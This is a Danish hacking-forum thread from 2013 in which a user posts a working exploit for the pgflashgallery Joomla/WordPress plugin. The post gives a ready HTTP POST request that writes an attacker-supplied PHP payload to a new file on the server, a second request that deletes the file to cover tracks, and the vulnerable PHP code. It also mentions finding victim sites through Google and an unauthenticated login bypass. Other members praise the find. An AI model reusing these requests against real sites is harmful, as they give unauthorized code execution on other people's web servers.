Shellsec / Hacking / Reverse Engineering / Vejledninger / [exploit] pgflashgallery arbitrary code execution

Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Visning af Tråd
[exploit] pgflashgallery arbitrary code execution
17-07-2013, 02:24
#1
flyingsonyy er Offline
Medlem
* 		Indlæg: 16
Registreret: Jul 2013
Omdømme: 0
[exploit] pgflashgallery arbitrary code execution
pgflashgallery er et Joomla/Wordpress plugin udviklet af http://www.photo-graffix.com.
Heldigvis er det her plugin ikke saerlig udbredt. Google kan dog finde nogle sider, der bruger det.

Exploit:
Kode:
POST /joomla/components/com_pgflashgallery/admin_functions2.php HTTP/1.1
Host: www.photo-graffix.com

func=add_new_option&cart_file=filename.php&global_cart_file=1&newop=[payload]
filename.php bliver lavet og indeholder den payload, der er givet med.

Vuln. code:
PHP kode:
$newop $_POST['newop'];
$global_cart_file $_POST['global_cart_file'];
if ($func == "add_new_option") {
  $udfile $cart_file;
  if(file_exists($udfile)){
    $newdata file_get_contents($udfile);
    $newdata str_replace("&END"$newop."&END"$newdata);
  }else{
    if($global_cart_file == 1){
      $newdata "&PG_BUY=".$newop."&END";
    }else{
      $newdata "&PG_DESCRIPTION=&PG_RATING=&PG_TAGS=&PG_COUNT=0&PG_COMMENTS=&PG_BUY=".$newop."&END";
    }
  }
$fp fopen($udfile"w+");
$fw fwrite$fp$newdata );
fclose$fp );


For at slette filen igen kan flg. POST request bruges:
Kode:
POST /joomla/components/com_pgflashgallery/admin_functions2.php HTTP/1.1
Host: www.photo-graffix.com

func=delete_cart_options&cart_file=filename.php&del_crtfile=1

Vuln. code:
PHP kode:
$cart_file $_POST['cart_file'];
$coption $_POST['coption'];
$del_crtfile $_POST['del_crtfile'];
if ($func == "delete_cart_options") {
  $udfile $cart_file;
  if ($del_crtfile == 1){
    (!unlink($cart_file)) ;
  }else{
    $newdata file_get_contents($udfile);
    $newdata str_replace($coption""$newdata);
    $fp fopen($udfile"w+");
    $fw fwrite$fp$newdata );
    fclose$fp );
  }

Har kun testet Joomla sider, men er overbevist om, at samme fejl er til at finde paa WP pluginet. Alt koden er usikkert. Der kan logges paa ved at saette et GET parameter til 1, men det her var umiddelbart den stoerste fejl, der var.
Find alle beskeder fra denne bruger
Citer denne besked i et svar
17-07-2013, 13:33
#2
VIPiTick er Offline
x64 has PIC
****
 		Indlæg: 648
Registreret: Jul 2013
Omdømme: 47
RE: [exploit] pgflashgallery arbitrary code execution
Nice. Jeg har ikke testet det, men det ser da ganske godt ud.
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
17-07-2013, 14:14
#3
sabu er Offline
Bandlyst
* 		Indlæg: 98
Registreret: Jun 2013
RE: [exploit] pgflashgallery arbitrary code execution
is it your sonny? dig der engang var på irc?

anyways fint fund. (:
Find alle beskeder fra denne bruger
Citer denne besked i et svar
18-07-2013, 11:04
#4
flyingsonyy er Offline
Medlem
* 		Indlæg: 16
Registreret: Jul 2013
Omdømme: 0
RE: [exploit] pgflashgallery arbitrary code execution
Nej, det maa vaere en anden :)
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)
Kontakt os | Shellsec | Vend tilbage til toppen | Let (arkiv) udseende | RSS synkronisering |